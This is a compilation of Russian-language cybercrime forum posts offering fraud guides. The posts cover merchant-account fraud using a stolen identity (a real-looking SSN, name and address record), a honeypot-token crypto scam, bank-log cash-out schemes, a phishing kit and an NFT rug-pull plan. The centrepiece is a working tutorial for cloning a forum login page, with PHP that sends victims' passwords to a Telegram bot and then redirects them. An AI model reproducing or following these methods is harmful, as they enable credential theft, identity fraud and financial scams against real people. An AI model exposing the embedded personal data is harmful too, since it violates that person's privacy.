После этого на указанный вами телефон среди глубокой ночи позвонят из в течении 24-72 часов и спросят - вы тот-то субъект, SSN которого ты вбил в форму и чей скан DL и скан VOID ты отослал, и ваш ли это сайт по продаже покемонов в рабочей робе с кирками? Ты говоришь - конечно да! После этого не пройдёт и 3-10 дней, как логин и пароль пришлют на мыло от доступа к терминалу!!!
После того, как выйдешь из запоя и сможешь различать цвета и наводить резкость, можно начинать бизнес. Первые $, если все ОК, придут через 2-7 банковских дней после первого рабочего дня.
Итого:
По расходам: все обойдется 1.5к-2.5к
По срокам: 1-2,5 месяца
Вероятность облома проекта (имею ввиду потерю $), возможна на каждом этапе. Но контроль за счетом находится в твоих руках или в руках твоих проверенных людей и это большой +.
Возможность №2
Надежные и проверенные наши бойцы невидимого фронта, находящиеся в США, или попросту деловые люди, помогающие нам и себе зарабатывать $ за % от движения $ по счету! Таких людей мало, но они есть! Назовем их по привычке дропами. Задача этого чела - взять на себя работу по пунктам 1,2,3! Человеку из US проще открывать там же бизнес - там все продумано для бизнеса как plug & play. Если немножко за скорость переплачивать, то открыть пункты 1,2,3 за 7-14 дней для него реально и это обойдется дешевле. Остальное все по плану из Возможно
Итого:
По расходам: все обойдется до 1к - max 1.5к
По срокам: 3-5 недель
Вероятность облома проекта увеличивается, так как в цепи появился новый человек и управление счетом завязано на нем - но ему по всей логике выгодно работать, так как он получает %. (вариант попадания на кидалу во время подбора дропа не исключён - т.е. его внезапное пропадание с $ после предоплаты за LLC и сч
Возможность № 3
Развод. Ищется партнер для бизнеса в US под предлогом помочь с проблемой .. мол сами мы не местные, из деревни Соплевки, и нашему бизнесу надо как-то расширяться, но нет возможности, так как злые дядьки с Authorize.Net не дали возможности простым людям продавать наши программы собственного производства по внедрению американским фермерам нового программного обеспеченья для слежения за скотиной со спутников не выходя из дома ... как бы нам решить эту маленькую проблему? Наша сверхустойчивая фирма готова отдавать вам (жертве амеру) аж 5-10% от оборота по счету!!! Но вы берете на себя все хлопоты по компании, счету и, самое главное, мерчанту!
Вот и все тут зависит от лоховатости американца. 80% сразу разорвут конект как услышат слово Россия или Украина. 10% еще поспрашивают про Соплевку - это где- то под сибирью? "Русская мафия убьёт" и тоже откажут 5%. Оставшиеся 5% - это потенциальные клиенты - и то с ними еще будет много проблем! Но тут есть много вариантов работы.
Итого:
Расходы от 0-500$ (если возмет на открытие - тут уж кто кого разведет)
Сроки 3-5 недель
Вероятность облома огромная
Некоторые дополнения:
Мерчант с успехом вешается не только на Bussines, но и на персональный счет вешается отлично, только больше бумаг амеру заполнить нада. А расходы на компанию исчезают.
При слове Росиия или Украина восновном не рвут коннект а заводят разговор о подписании контракта.(что собст-но не очень большая проблема). Остальные же покупаются на это и даже часто берут на себя расходы по открытию мерча чтобы быстрее получить свои %.
Кидают жутко.... Особенно когда начинаются звонки от недоумевающих кардхолдеров. Парочка таких звонков объясняется амеру легко, а вот 20-30 уже заставляют его призадуматься.
Из 4-х мерчей которые были открыты по методу №3 до победного конца дошел
только 1-н.
Открытие юр. лица в USA
Итак, первым делом стоит определиться с типом компании Есть множество видов,
таких как LPSP;SC GP:NPC и так далее, но нас будет интересовать именно с
Limited Liability Company самый лёгкий, дешёвый и быстрый в регистрации тип
компаний. В теории по мануале ниже вы сможете зарегестрировать и другие виды
Регистрируем Employer identification number
Большинство мерчей в США требуют при регистрации указать EIN - employer
identification number. Это что-то типа нашего ИНН для юрлиц. И многие
спрашивают как этот самый ЕИН взять/регнуть. Конечно, есть сайты для пробива
ЕИН, но с необходимостью вбить подписку. Нам же это ни к чему, поэтому будем
регать его сами, ибо сложного нет ничего.
Допустим у нас есть фулка 068745309|1985-06-26|Taylor Plew|179 YEAGER
DR;Buffalo;14225;NY|7165537528.
Идем на сайт irs.gov. Можно хоть с основы, под впн юса. Ну и в рабочие часы по
юсе
Или просто идем по этой ссылке
https://sa.www4.irs.gov/modiein/individual/index.jsp
Первая строчка это ИП по нашему. Самое простое, почти везде этого достаточно.
Можно регать LLC, но рега сложнее, да и потом **** может отрисовки для них
запрашивать.
Вводим
ФИО и ССН нашей фулки
Адрес пишем фулки, туда ничего не отправят.
Округ и штат проставил Сам сайт. Trade name/DBA лучше оставить не тронутым. В
таком случае название компании=фио фулки, в нашем случае компания называется
Taylor Plew . Если заполнять какое-либо другое, например Taylor_Carding_228,
то **** опять же может потребовать доки, что это DBA принадлежит вам.
В зависимости от выбранной сферы следующие пара страниц будут индивидуальными.
Только онлайн.
Я хочу работать в кардинге. но я новичок, пожалуйста, помогите. Как обойти защиту системы 3d Secure. Если возможно, предоставьте полную информацию
Статья взята с канала Канала - https://t.me/burnout_dev (Не реклама)
Криптоскам становится все популярней и популярней он модернизируется с
развитием технологий. Изобретаются куча разных схем обогащения, о которых я
буду рассказывать у нас на канале. Схем море, ни к чему не призываем, но
каждый для себя найдет пищу для размышлений. Статья представляет собой сугубо
информационный посыл.
График ханипот контракта
Погнали, что представляет из себя ханипот?
Ханипот - сматрконтракт токена, который люди могут купить, но не могут продать это самым простым языком.
Но это самый примитивный контракт, есть более умные версии и реализации.
Например:
Ханипот с функцией продажи только у владельцев контракта (можно добавить сколько угодно кошельков) Вы загоняете бабки на эти кошельки, с них покупаете токен и продаете, чтобы нарисовать красивый график и соответственно повысить траст для хомяков, чтобы они смотрели и видели и покупки и продажи.
Далее, одна из важных функций, которая нужна в контракте, это блокировка торговых ботов. Если у вас не заблокированы боты, то когда вы апнете курс своими деньгами или купят хомяки, то бот спиздит у вас часть средств.
Как это происходит.
После крупной покупки (крупная или нет рассчитывается от количества вашей ликвидности, если происходит увеличение курса больше чем на 10% это крупная) и в момент покупки бот через адрес пары обмена, делает 2 транзакции покупка и продажа "ДАЖЕ ЕСЛИ ПРОДАЖИ ЗАКРЫТЫ У ВАС" транзакции происходят в секунду и боту удается заработать от пары баксов до любых сумм лично я видел 300$+ за транзакцию бот выкачивал из ликвидности.
Поэтому надо чтобы это было заблокировано.
Способы применения контракта
Как завещал Сергей Пантелеевич
Хватит теории, теперь самое интересное, как зарабатывают бабки на этом. Раскрою пока что один способ сливки оставлю на потом, так что оформляем подписку на канал и ожидаем, статей будет много.
Но естественно лучше, когда токен выходит вот вот. Через час допустим, тут будет самый сок сбора денег.
А так можно и раньше делать, хоть за месяц до выхода, хомяки они на то и хомяки.
Один проект можно скамить несколько раз хоть 10, но с перерывом в пару дней.
Так, как происходит этот чудо скам на ханипоте.
Возвращаемся к проекту.
Вот есть проект, у которого выходит токен завтра в 14 по мск, представим проект STEPN токен называется GMT. (До пизды, где он у них выходит, централизованная биржа или децентрализованная и сеть на который они выходят до пизды) Потому что, что? Правильно, лох не мамонт.
Так вот условные "скамеры на ханипотах" берут чат проекта в тг. И парсят их аудиторию.
Далее создают, токен с идентичным названием (GMT). Правильно это называется деплой контракта токена Ханипота.
Теперь у скамеров есть выпущенный токен с названием GMT, который люди не смогут продать.
Далее надо разместить токен на децентрализованной бирже Pancakeswap и добавить ликвидность.
Звучит наверно все пиздец сложно, но чтобы разобраться надо 5 минут.
Котик для разгрузки
Едем дальше
Теперь Скамеры имеют Аудиторию в текстовике и Задеплоенный и размещенный контакт ханипот токена GTM
Что с этим делать дальше?
пример сообщения, тут ваш полет фантазии не ограничен, этот скам мне прилетел вчера
3. Подготавливают список ников и аватарок для оформления аккаунтов (например STEPN Support, STEPN ADMIN) латиница+кириллица работает для рандомизации имен. Ну и аварки соответственные взять у проекта авы)
Далее имея это все, спамер оформляет аккаунты, как нужно. И вписывает сообщение, которое будет рассылаться.
Ну и собственно токен выходит в 14 по мск, в 13.00 начинается рассылка допустим на 10к человек
И скамеры сидят и смотрят как люди покупают их токен. Потому что, что лох не мамонт лох не вымрет.
На такого рода схемке я видел, как скамеры собирали по 50к+ баксов за час))
Можно и не окупить рассылку, тут все зависит от правильности выбранного проекта и своевременной реализации.
На сегодня у меня все. Всем спасибо.
Если какие вопросы в чат задавайте.
Буду признателен, если поделитесь статьей с кентами и все вместе вступите к нам в канал.
На днях будет новая статья, благо схем по криптоскаму хренова гора, могу писать без остановки)))
Лучший фишинг KFC с отправкой логов в телеграм
СС + СМС
anonfiles.com
Spoiler: VT:
](https://www.virustotal.com/gui/file/f9eb0c90e5840703ca1d71b7e8a50455eaef34c539a7c3ba3f73a261ece04c1a)
VirusTotal
www.virustotal.com
Ставим, обязательно клоачим, льём и вбиваем
В архиве psd макеты банковских карт фронт и бэк:
Сберголд
Втб
АмериканЭксперсс
Ситибанк
Приватбанк
Банк оф америка
и много других
рамзер архива: 583mb
You must have at least 30 message(s) to view the content.
Всех Приветствую,хочу сегодня немного приоткрыть свет на актуальные направления в карже на 2023 год,так-как смотря даже на 18-19 год,когда я попал в это русло и решил посвятить этому свою жизнь,можно сказать что все нихуево изменилось
Начало истории кардинга и развитие
Давайте начнем с самого начала,изначально кардинг был «мошенничеством» с кредитными картами,но со временем все изменилось,в конце 90 начали появляться дампы,думаю все хорошо знают Сергея Павловича(Police Dog),Владислава Хорохорина(BadB),Дмитрия Смилянцева(Смелый) и многих других кардеров отсидевших за продажу сс и дампов
Тогда все работали с картами,в основном это был вещевой кардинг,заказывали сразу к себе домой,без каких либо впн или прокси,в то время все было намного проще
На данный момент,я не знаю успешного кардера который бы работал с сс или дампами
Карж начал развиваться,в 10 годах пришли логи,свою популярность набрали в 15-16 году,тогда все еще была актуальна работа с сс,но позже все начало угасать
Я окончательно решил заняться каржем в конце 18 года,тогда было очень актуальное такое направление как логи и для себя я видел 2 ниши:
Логи Палки - Оплачивать с помощью чужого Paypal акаунта какие либо товары,что и стало моей первой темой и с этого выбрал такой никнейм)
Логи Амазона - Покупать с логов амазона с привязанной сс кардхолдера различный товар(не моя движуха)
Что такое логи?
Лог- куки с браузера кх,логины и пароли,информация о системе кх
Выплаты по ковиду
Ни для кого не секрет,что во время ковида америка напечатала триллионы ничем не обеспеченных долларов и роздвала бабки на право и на лево,около 50% было выплачено самым нуждающимся в деньгам людям,а именно НАМ))
На тот момент в рынке стало настолько много посредов что % на обнал начал падать,с 20-21 год концентрация посредов зашкаливала и много кто заработал на этом порядочные суммы
Наше время
Теперь по хронологии мы дошли к 23 году и как ситуация выглядит внутри сейчас?
Большинство комьюнити перешло к работе с банками,а именно с брут/фиш ба
На данный момент это самая кассовая и безопасная ниша!
Добавлю немного скринов для понимания и мотивации
По какому принципу все работает?
Условно у нас есть брут какого нибудь банка,например Chase(чисто пример,брута чейза давно нету на рынке)
Наша суть перегнать бабки с него на другой банк,например TD Bank и с него или забрать обратным ACH на другой саморег или линкануть свою вцц и слить на нее бабки
Схема выглядит так:
Брут-Саморег-Вцц
То есть,мы регаем под фулку брута кх TD Bank к нему по ан рн вяжем брут Chase,если мы делаем под фулку кх,все линканеться инстой,но если энинейм,то нужно будет конфирмить миники,идут они 1-2 биз дня
После линковки брута делаем деп,идет он от 3 до 5 биз дней,все зависит от ба в который вы депаете,после прихода денег линкуем вцц
Хорошими вцц на данный момент являються Chime и TIV ,в некст мануалах разберем их регу
Слить лаве на вцц - это самый козырный варик,обналы дают за суммы 500-1к около 78-80%,за суммы 3-10к на одной вцц 82-84%
Если вцц лезет онли в юса мерч вы получите около 65% все что ниже - посреды
Если вы потянули обратным ACH на другой саморег ба,сналить его смогут только за 60-70% и с холдом от нескольких дней до нескольких недель
Немного терминологии:
ACH - перевод,транзакция по реквизитам AN RN
Обратный ACH - сьем денег при помощи линковки банка по an rn
AN - account number,индивидуальные цифры акаунта,которые нужны для зачисления или снятия средств
RN - routing number,цыфры эмитента банка
Миники - 2 мини депозита,которые приходят на ваш брут ба,для подтверждения привязки
Vcc - virtual credit card
Так же можно залить контору по такому же принципу
Брут-контора-вцц
С конторами рекомендую работать с телефона,в дальнейшем выкачу ман про настройку айфона с джейл брейком,позволяет установить мульти логин и делать большое количество акаунтов с одного устройства
Обычно в конторах линковка идет по Plaid
Plaid - система которая подключает банки по логину и паролю,зачастую просит код на номер/почту,но есть инст плайд ба по типу Telhio,Msufcu,Unionbank и тд
Какой антик лучшего всего юзать для плодотворного ворка?
Я юзаю окту и вполне доволен ей,простой и хороший антик
Какие взять носки?
Я предпочитаю фейсы
faceless.cc
В этом мануале я хотел объяснить новичкам базовый принцип,так сказать «пилотная серия» в следующем мануале подробно раскрою как регать банки,как пробивать вопросы по бг/кр,машины и другое
от данного вида атаки используйте 2FA и проверяйте домен сайта на который заходите. Используйте на всех сайтах разные пароли.
И так, что же такое фишинг для тех кто не в курсе.
Фи́шинг — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.
Click to expand...
Это нам выдает Википедия, а если по простому это копия сайта будь-то выкачанная верстка или сделанная своими руками 1в1, на которой при нажатии кнопки войти или login или же нажатие на enter данные из полей логин и пароль не отправляются на сервер сайта с целью попытки входа, а летят прямиком на наш сервер и далее уже в telegram чтоб было удобно их читать.
К слову, полученные логин и пароль могут подойти не к только аккаунту сайта на который жертва пытается войти, а и на другие сайты тоже, человек ленив по своей натуре и большинству впадлу хотя-бы использовать разные пароли на сайтах поэтому мы это сможем использовать вдвойне пытаясь сбрутить и другие форумы тоже типа ВВХ, лолз и другие.
Исходя из выше рассказаного нам понадобится верстка или копия страницы авторизации нашего форума. Вариант сверстать вручную оставим на крайний случай, первым делом нужно попробовать скачать страницу автоматически и посмотреть чтоб она была без косяков, банально экономим время.
Мамкины кул хацкеры используют Linux, и на нем уже есть встроенная тулза которая нызвается wget. Те у кого ее нет и сидят на Debian дистрибутивах установите ее с помощью команды
Code:Copy to clipboard
sudo apt update && sudo apt install wget
Загуглив linux wget full page stackoverflow нам выдает такую команду
Ее мы и будем использовать. Страница авторизации находится по ссылке
https://xss.is/login, ее мы и вставляем в нашу команду.
Code:Copy to clipboard
wget \
--recursive \
--level 5 \
--no-clobber \
--page-requisites \
--adjust-extension \
--span-hosts \
--convert-links \
--restrict-file-names=windows \
--domains yoursite.com \
--no-parent \
https://xss.is/login
На всякий случай скажу прописывайте команду уже в заранее в созданной папке на рабочем столе чтоб потом не лазить по компу и не искать куда скачался сайт.
По итогу скачивания мы получаем один файлик index.html
source файлы типа css, js всяких скриптов нам и не нужны локально, достаточно
будет того что они подтянутся с хоста форума.
Пример:
<script src="https://xss.is/js/xf/login_signup.min.js?_v=88682c32"></script>
Всегда советую поднимать локальный сервер чтоб посмотреть результат скачанного
сайта локально через браузер, иногда бывают скрипты не работают если открывать
index.html по пути пример:
file:///home/me/Downloads/test/xss.is/login/index.html
но корректно работают на
localhost или localhost:8000
Можете скачать OpenServer или Xampp , включить Apache и закинуть index.html
именно туда и по localhost посмотреть что получилось. Но я не люблю эти проги,
мне проще это сделать с помощью php и вот как.
Если у кого-то не стоит php, ставьте через
sudo apt install php
проверьте чтоб была последняя версия 8.1 или 8.2 что-то такое, если поставится
7.4 это уже устаревшая и просто не очень ее использовать, но это на будущее.
Команда чтоб поднять локальный сервер
php -S localhost:8000
Прописывать естественно в папке, в которой лежит наш index.html
Можем смотреть в браузере что у нас вышло
Нам крупно повезло страничка отображется корректно, без косяков и багов по
верстке, обычно когда выкачиваешь сайт в 90% случаев нужно делать какие-то
правки чтоб копия была практически 1 в 1, а тут все ок.
Открываем в VSCODE папку с файлом, открываем index.html и чтоб найти форму с
полями логина и пароля проще по поиску вбить Имя пользователя или email и на
700 строчке сразу находим нашу форму.
Чуть-чуть выше видим строчку
<form action="https://xss.is/login/login" method="post" class="block"
тут нам нужно поменять action, именно по нему будут отсылаться все данные из
формы, логин пароль токен _xfToken и прочее, но из всей каши мы возьмем только
лог:пасс.
Меняем action на otstuk.php
Выйдет вот так
<form action="otstuk.php" method="post" class="block"
Конечно теперь нужно создать этот файл в папке и прописать код который будет
отправлять наши данные в телегу.
Первое что нужно это проверить что вообще отсылается. Для этого напишем вот
такой код
PHP:Copy to clipboard
<pre> //делает красивый вывод
<?php // обозначаем что пишем php код
var_dump($_POST); // вар дамп - вывод переменной,
переменная $_POST содержит в себе все отылаемые данные
Сохраняем, заходим на наш localhost заполняем тестовые данные и нажимаем
кнопку войти.
Можем увидеть что все работает корретно, данные приходят, мы видим наши тестовые лог пасс, а остальное нам не нужно.
Создайте своего бота через https://t.me/botFather, с помощью бота мы будем
получать лог:пасс в личку. Скопируйте выданный токен.
Обязательно отправьте боту /start чтоб создать с ним чат.
С помощью https://t.me/userinfobot узнайте свой chat_id. Это нужно чтоб наш бот понимал кому отправлять сообщение.
В итоге вы должны записать где-то свой чат айди и токен бота созданного.
\
В апи Telegrama чтоб отправить сообщение от бота в ЛС используется HTTP GET запрос.
https://api.telegram.org/botTOKEN/sendMessage?chat_id=HERECHATID&text=TEST
Вместо TOKEN - вставляется наш токен бота
Вместо chat_id - наш chat ID.
Text - текст сообщения обязательно закодированный для урлов (urlencoded).
Но если мы вставим ссылку в браузер то он сам закодирует наше сообщение, кодировать нужно будет только в PHP коде.
Давайте попробуем отправить тестовое сообщение.
https://api.telegram.org/bot6062552065:AAH4TpFlhP3VZ84rGi5MBPADBC4dCW3BqdM/sendMessage?chat_id=6142058098&text=TEST
У меня вышла такая ссылка, вставляю в браузер и смотрю что выходит.
Все работает!
И бот прислал сообщение.
Убираю все что написал раньше, и пробую интегрировать это в PHP. Чтоб выполнить гет запрос достаточно будет использовать функцию file_get_contents
PHP:Copy to clipboard
<?php
file_get_contents('https://api.telegram.org/bot6062552065:AAH4TpFlhP3VZ84rGi5MBPADBC4dCW3BqdM/sendMessage?chat_id=6142058098&text=TEST');
Теперь по нажатию на кнопку войти на странице фиша нас будет перекидвать на otstuk.php и бот телеги будет отправлять нам сообщение TEST.
Заменим TEST на лог пасс и далее редирект на главную страницу форума чтоб не вызывать подозрений.
Создадим переменную $message = ''.
Чтоб засунуть в нее логин добавим такую строчку
$message .= 'Login: ' . $_POST['login'];
Так как переменная пост это массив можно к нему обратиться по ключу логин и получить его собственно.
Проверим что в себе хранит теперь переменная $message. Это можно сделать строчкой.
var_dump($message); die;
die - завершит выполнение кода чтоб не отправлять гет запрос во время нашего
дебага.
Все работает правильно, по такой же схеме добавляем пароль в нашу переменную $message, только к логину добавим снос строки чтоб сообщение не было в одну строчку.
$message .= 'Login: ' . $_POST['login'] . "\n"; // сноска
$message .= 'Password: ' . $_POST['password'];
Дебажим
Все в одну строчку, но когда в телеге будет отправляться сообщение оно будет красиво.
Последний этап вместо TEST ставим нашу переменную и добавляем редирект.
file_get_contents('https://api.telegram.org/bot6062552065:AAH4TpFlhP3VZ84rGi5MBPADBC4dCW3BqdM/sendMessage?chat_id=6142058098&text=' . urlencode($message));
Редирект делается с помощью
Header('Location: https://xss.is/login/');
Не забудьте убрать die; , а то код будет останавливаться.
Итоговый результат должен быть примерно такой
PHP:Copy to clipboard
<?php
$message = '';
$message .= 'Login: ' . $_POST['login'] . "\n";
$message .= 'Password: ' . $_POST['password'];
var_dump($message);
file_get_contents('https://api.telegram.org/bot6062552065:AAH4TpFlhP3VZ84rGi5MBPADBC4dCW3BqdM/sendMessage?chat_id=6142058098&text=' . urlencode($message));
Header('Location: https://xss.is/login/');
Зайдем в браузер на наш localhost, введем логин пароль и посмотрим что выйдет.
Все работает!
Telegram прислал мне сообщение
А браузер перекинул меня на оригинальную ссылку форума.
Примерно так делается фиш, повторюсь не используйте на форумчанах, это все
лишь в качестве ознакомления и привлечения вашего внимания с целью более
доступно обьяснить информацию.
Самая большая благодарность это ваши лайки и комментарии.
Если хотите продолжение или статью на похожую тематику пишите буду делать.
EN :
Hello,
I would need to have your feedback on the gateway payments available for
fakeshops.
I need a payment gateway that cashout the money in the bank account the same
day or the next day.
Fakeshop is for EUROPE people only.
I need to avoid blocking funds.
RU :
Привет,
Мне нужны ваши отзывы о шлюзовых платежах, доступных для фейковых магазинов.
Мне нужен платежный шлюз, который обналичивает деньги на банковский счет в тот
же день или на следующий день.
Fakeshop предназначен только для жителей ЕВРОПЫ.
Мне нужно избежать блокировки средств.
И так, снова всех приветствую.
Долго я думал над тем, что бы мне написать в третьей статье, пришлось даже
отложить всю работу и поездить потаксовать для
размышления
И вот оно, только я подъезжаю к дому, абсолютно ни с чем в голове, закуриваю
сигарету и приходит в голову одна история, которая будет очень занимательной и
увлекательной.
В этой теме мы получим новые знания, разберем реальную историю, задействуем
СИ, ну и куда же без капельки
программирования
Поехали.
Вот мы уже запустили самые разные проекты с использованием функции автовывода
НФТ и трансфера эфира, собрали некоторый бюджет, получили знания, связи с
разными людьми, научились гнать траффик, стали понимать мышление потенциальных
жертв.
А куда двигаться дальше?
Конечно же запускать проекты большого масштаба, пора играть по крупному.
И сейчас мы разберем создание Скам НФТ-Проекта.
Профиты: До шести, а то и семи-значных сумм в $.
Конечно же в идеале для этого иметь команду как минимум в 2-3 человека,
которые будут шарить и понимать, что делать.
Цель проекта:
Раскрутиться, собрать как можно большую аудиторию, и в идеальном случае -
коллаб с какой-либо другой НФТ-коллекцией, у которых в планах нету заскамить
своих
последователей/реселлеров/холдеров
После чего запустить продажи, но а после - закрыться.
Затраты:
-Бюджет - чем больше, тем лучше.
-Ресурсы для повышенного доверия: в идеале иметь аккаунты твиттер с галочкой потвержденного профиля и опенси с галлочкой(Способы получить расскажу)
Грамотная стратегия развития
Какой бы у вас не был красивый и внушающий доверие проект - он ничто без
грамотного подхода к набору ажиотажа.
Также обязательно нужно продумывать все события наперед.
В общем, это не просто залил на гугл адс и жди
профита
Но и суммы могут стать намного интереснее, если все получится так, как вы
пожелаете.
Легенда
У большинства популярных NFT-Коллекций есть своя дорожная карта, есть своя
история, а также она обязательно чем-то подкреплена.
Держатель обязательно должен получить что-то, покупая вашу НФТ.
Поэтому нужна легенда, где вы обещаете золотые горы/привилегии и т.п.
Команда
В команде обязательно нужны: художник / тот кто будет продвигать продукт и
общаться с людьми / тот кто поставит всё наше дело в рабочее состояние. Если
вы тот человек, что 3 в 1, то это прекрасно! Но будет трудно)
Вот мы уже немного разобрались и начали понимать, к чему ведет разговор.
Хорошо, создаем нфт коллекцию >раскручиваем>продаем>сливаемся.
**Давайте теперь разберем на примере и более подробно: что к чему и почему.
Сегодня мы запускаем будущую топ-1 NFT-Коллекцию XSS-Metaverse.
Для начала нам нужна легенда, что будет представлять из себя эта коллекция и
составленная дорожная карта(Roadmap/Цели проекта).**
Анонс! На свет выходит NFT-Проект, обещающий дать будущее криптомиру!
XSS-Metaverse — это NFT Коллекция, направленная на создание масштабного
сообщества последователей нашего проекта. Мы создадим плотное сотрудничество с
коллекциями, которые имеют хороший и надежный статус в сообществе NFT.
У каждой NFT из коллекции XSS-Metaverse есть своя ДНК, которая будет
складывается из его характеристик.
Наш художник подготовил более 300 характеристик для создания самых уникальных
персонажей.
Ангелы будут расположены в сети Ethereum и будут написаны, используя контракт
ERC721 с оптимизацией стоимости газа. Маркетинг коллекций NFT с каждым днем
становится все сложнее, и наша команда придумала совершенно новый подход к
созданию мощного комьюнити.
Наша дорожная карта:
1. Создание сообщества
Создание масштабного сообщества, которое поддерживает наши интересы и
развивается вместе с нами и помогает нам развиваться.
2. Партнерство
Создание партнерских отношений с большими коллекциями, которые разделяют наши
интересы.
Укрепление нашего сообщества.
3. Старт продаж
Старт продаж коллекции NFT.
Все NFT будут раскрыты, и вы сможете поделиться своими NFT в социальных сетях.
4. Подарки
Раздача подарков среди владельцев NFT.
5. Инвестирование
Инвестирование вырученных средств в развитие. Начало работы над продуктом.
6. Стартовый токен
Выпуск токена ERC20 $XSS. Каждый из первых владельцев NFT попадает в список
аирдропов. На ваших кошельках появятся токены, которые вы сможете обменять на
uniswap и других обменниках, где мы создадим пул ликвидности.
7. XSS метавселенная
Токены должны где-то использоваться. Поэтому мы создаем XSS метавселенную, где
владельцы NFT могут фармить токены. Вырученных средств хватит на выпуск
качественного и крутого продукта.
Конечно же легенда должна закрепиться красивым и качественным сайтом.
Создаём сайт для представления и демонстрации наших планов.
**После того, как мы запустили сайт с нашей легендой, можно приступать к
старту раскрутки комьюнити.
Большая часть аудитории НФТ мира сидит на твиттере, поэтому начнём с твиттера.
Для самой лучшей эффективности нам нужно приобрести твиттер аккаунт с галочкой
Способы получить:
Купить/Украсть/Верифнуть
-Купить такой аккаунт возможно на тематических форумах/шопах, если есть в наличии, но чаще всего их быстро скупают.
-Украсть можно как заслав стиллер, так и с помощью фишинга.
-Верифнуть самому будет довольно трудно, нам нужно будет найти значимую персону/организацию, которой нету на твиттере и потвердить, что вы представитель. Находим > отрисовываем документы > верифицируем.
Далее после того, как мы получили такой аккаунт - меняем оформление под свой
проект.
Наполняем контентом, проводим различные евенты, заказываем накрутку фоловеров,
лайков, ретвитов и комментариев по вашему тексту(ОБЯЗАТЕЛЬНО!), отмечаем в
комментариях с других аккаунтов НФТ-холдеров(которых нам необходимо собрать в
списочек/спарсить)
И вот у нас аккаунт твиттера имеющий потверждение с якобы существующим
коммьюнити! Главное - держать всегда на плыву, чтобы актив был постоянный. Не
забываем отвечать в личных сообщениях!
Далее спокойно верифаем опенси аккаунт с помощью полученных ресурсов)
После пройденного процесса нам необходимо отрисовать и сгенерировать саму NFT- Коллекцию**
Отрисовка:
Разберем на примере. Заходим в топовую коллекцию
CryptoPanks(тык)
И обратим внимание на картинки, все они имеют разную атрибутики, цвет кожи,
прически, бороды, волосы, шапки.
Все это рисуется отдельно для генерации большого колличества NFT рандомным
образом.
Нам нужно создать отдельные папки с отдельными рисунок. Расширение по высоте и
ширине, местоположение отрисовок обязательно учитывается.
После того, как отрисовали - продолжаем.
Генерация:
Для работы нам потребуется установленные на компьютере:
Visual Studio Code
Node.js
Соурс скрипт (клик)
Также в линке на соурс код снизу будет прописан мануал по использованию)
Полностью рассказывать уж не стану что к чему, если вы дошли до этого, то
думаю у вас есть возможности разобраться с предоставленными ресурсами)
После того как мы подготовили скрипт - нужно его запустить, прописываем в
терминале Visual Studio Code:
node index.js
И у нас стартует генерация
картинок
Далее сгенерированные картинки(саму папку) загружаем на
Pinata(клик) для получения метаданных.
Получаем метаданные, копируем их и идём обратно в наш скрипт,в config.js
И в строчке const BaseUrl вставляем и вписываем в терминал и пишем update
info.js
Переходим обратно в пинату и загружаем туда теперь не картинки, а json
файлы(всю папку) и оставляем пока как есть, работаем дальше
Смарт контракт ERC721
Code:Copy to clipboard
import "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import "@openzeppelin/contracts/utils/Counters.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
contract SimpleNftLowerGas is ERC721, Ownable {
using Strings for uint256;
using Counters for Counters.Counter;
Counters.Counter private supply;
string public uriPrefix = "";
string public uriSuffix = ".json";
string public hiddenMetadataUri;
uint256 public cost = 0.01 ether;
uint256 public maxSupply = 10000;
uint256 public maxMintAmountPerTx = 5;
bool public paused = true;
bool public revealed = false;
constructor() ERC721("NAME", "SYMBOL") {
setHiddenMetadataUri("ipfs://__CID__/hidden.json");
}
modifier mintCompliance(uint256 _mintAmount) {
require(_mintAmount > 0 && _mintAmount <= maxMintAmountPerTx, "Invalid mint amount!");
require(supply.current() + _mintAmount <= maxSupply, "Max supply exceeded!");
_;
}
function totalSupply() public view returns (uint256) {
return supply.current();
}
function mint(uint256 _mintAmount) public payable mintCompliance(_mintAmount) {
require(!paused, "The contract is paused!");
require(msg.value >= cost * _mintAmount, "Insufficient funds!");
_mintLoop(msg.sender, _mintAmount);
}
function mintForAddress(uint256 _mintAmount, address _receiver) public mintCompliance(_mintAmount) onlyOwner {
_mintLoop(_receiver, _mintAmount);
}
function walletOfOwner(address _owner)
public
view
returns (uint256[] memory)
{
uint256 ownerTokenCount = balanceOf(_owner);
uint256[] memory ownedTokenIds = new uint256[](ownerTokenCount);
uint256 currentTokenId = 1;
uint256 ownedTokenIndex = 0;
while (ownedTokenIndex < ownerTokenCount && currentTokenId <= maxSupply) {
address currentTokenOwner = ownerOf(currentTokenId);
if (currentTokenOwner == _owner) {
ownedTokenIds[ownedTokenIndex] = currentTokenId;
ownedTokenIndex++;
}
currentTokenId++;
}
return ownedTokenIds;
}
function tokenURI(uint256 _tokenId)
public
view
virtual
override
returns (string memory)
{
require(
_exists(_tokenId),
"ERC721Metadata: URI query for nonexistent token"
);
if (revealed == false) {
return hiddenMetadataUri;
}
string memory currentBaseURI = _baseURI();
return bytes(currentBaseURI).length > 0
? string(abi.encodePacked(currentBaseURI, _tokenId.toString(), uriSuffix))
: "";
}
function setRevealed(bool _state) public onlyOwner {
revealed = _state;
}
function setCost(uint256 _cost) public onlyOwner {
cost = _cost;
}
function setMaxMintAmountPerTx(uint256 _maxMintAmountPerTx) public onlyOwner {
maxMintAmountPerTx = _maxMintAmountPerTx;
}
function setHiddenMetadataUri(string memory _hiddenMetadataUri) public onlyOwner {
hiddenMetadataUri = _hiddenMetadataUri;
}
function setUriPrefix(string memory _uriPrefix) public onlyOwner {
uriPrefix = _uriPrefix;
}
function setUriSuffix(string memory _uriSuffix) public onlyOwner {
uriSuffix = _uriSuffix;
}
function setPaused(bool _state) public onlyOwner {
paused = _state;
}
function withdraw() public onlyOwner {
(bool os, ) = payable(owner()).call{value: address(this).balance}("");
require(os);
}
function _mintLoop(address _receiver, uint256 _mintAmount) internal {
for (uint256 i = 0; i < _mintAmount; i++) {
supply.increment();
_safeMint(_receiver, supply.current());
}
}
function _baseURI() internal view virtual override returns (string memory) {
return uriPrefix;
}
}
Берём данный смарт контракт и тащим его в
Remix(клик)
В папке Contracts создаем файл Name.sol (*name - на ваше название)
И вставляем наш контракт в этот файл.
Далее переходим в Plugin Manager и находим там плагин Flattener, после чего
устанавливаем его.
После переходим в компилятор и компилируем наш солидити код.
После компиляции возвращаемся во Flattener и верифицируем наш контракт
После верификации сохраняем)
Переходим обратно в наш смарт контракт и находим там строчку:
Code:Copy to clipboard
constructor() ERC721
Вписываем имя нашей коллекции и краткое название
